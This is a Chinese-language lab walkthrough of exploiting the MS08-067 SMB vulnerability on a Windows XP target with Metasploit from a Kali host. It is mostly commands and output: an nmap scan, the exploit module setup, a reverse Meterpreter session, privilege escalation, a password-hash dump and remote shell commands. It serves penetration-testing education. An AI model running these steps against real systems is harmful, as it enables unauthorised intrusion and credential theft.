MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击.
下面的实验为本地测试环境,一台Kali主机攻击机,一台Windows Xp靶机
Kali攻击机:192.168.34.220
windows Xp: 192.168.34.189
步骤一、启动postgresql
root@kali:~# /etc/init.d/postgresql restart
[ ok ] Restarting PostgreSQL 9.1 database server: main.
步骤二、启动metasploit
root@kali:~# /etc/init.d/metasploit restart
[ ok ] Stopping Metasploit worker: worker.
[ ok ] Stopping Metasploit web server: thin.
[ ok ] Stopping Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit rpc server: prosvc.
[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.
root@kali:~# msfconsole
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit!
;@'. __*__,." |--- _____________/
'(.,...."/
Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.4-2015071402 ]
+ -- --=[ 1476 exploits - 931 auxiliary - 246 post ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
步骤三、查看数据连接状态
msf > db_status
[*] postgresql connected to msf3
步骤四、启动nmap 扫描
msf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.34.189
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-24 14:39 CST
[*] Nmap: Nmap scan report for 192.168.34.189
[*] Nmap: Host is up (0.0082s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https?
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 777/tcp open multiling-http?
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 6002/tcp open http SafeNet Sentinel License Monitor httpd 7.3
[*] Nmap: 7001/tcp open afs3-callback?
[*] Nmap: 7002/tcp open http SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
[*] Nmap: SF-Port777-TCP:V=6.47%I=7%D=9/24%Time=56039AF6%P=x86_64-unknown-linux-gnu%
[*] Nmap: SF:r(Kerberos,5,"x01txe0x06")%r(SMBProgNeg,5,"x01txe0x06")%r(T
[*] Nmap: SF:erminalServer,A,"x01txe0x06x01txe0x06")%r(WMSRequest,5,"x0
[*] Nmap: SF:1txe0x06");
[*] Nmap: MAC Address: 00:0C:29:84:07:87 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: dh-ca8822ab9589; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: | MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | Conficker: Likely CLEAN
[*] Nmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: | MS06-025: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |_ MS07-029: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 169.76 seconds
步骤五、搜索漏洞模块
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
步骤六、查看配置选项
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
步骤七、配置参数
msf exploit(ms08_067_netapi) > set RHOST 192.168.34.189
RHOST => 192.168.34.189
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.189 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.34.189 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
步骤八、开始利用
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.34.220:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 192.168.34.189
[*] Meterpreter session 1 opened (192.168.34.220:4444 -> 192.168.34.189:1059) at 2015-09-24 14:45:52 +0800
步骤九、成功返回shell ,meterpreter 的操作
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).hashdump
meterpreter > hashdump
Administrator:500:0182bd0bd4444bf8aad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:32f842845a64f17ccbe6b10315169b7e:83789c0d8506a618d815fd9c6fb379e1:::
IUSR_DH-CA8822AB9589:1003:de8b8cec054052bb8ab2d451a3e61856:145f992fa5ff125301520f8e27419c6d:::
IWAM_DH-CA8822AB9589:1004:90b05d38a1fc8d80a4ae31c7bc961352:2f950167d2942f7c977fdfd1857b8a59:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bb5a5a239a6e521be591fdf091b05013:::meterpreter > shell
Process 3368 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.34.189
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.34.254
C:WINDOWSsystem32>net user
net user
User accounts for \
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
IUSR_DH-CA8822AB9589 IWAM_DH-CA8822AB9589 SUPPORT_388945a0
The command completed with one or more errors.
关于分享内容中的靶机,请百度搜索一下。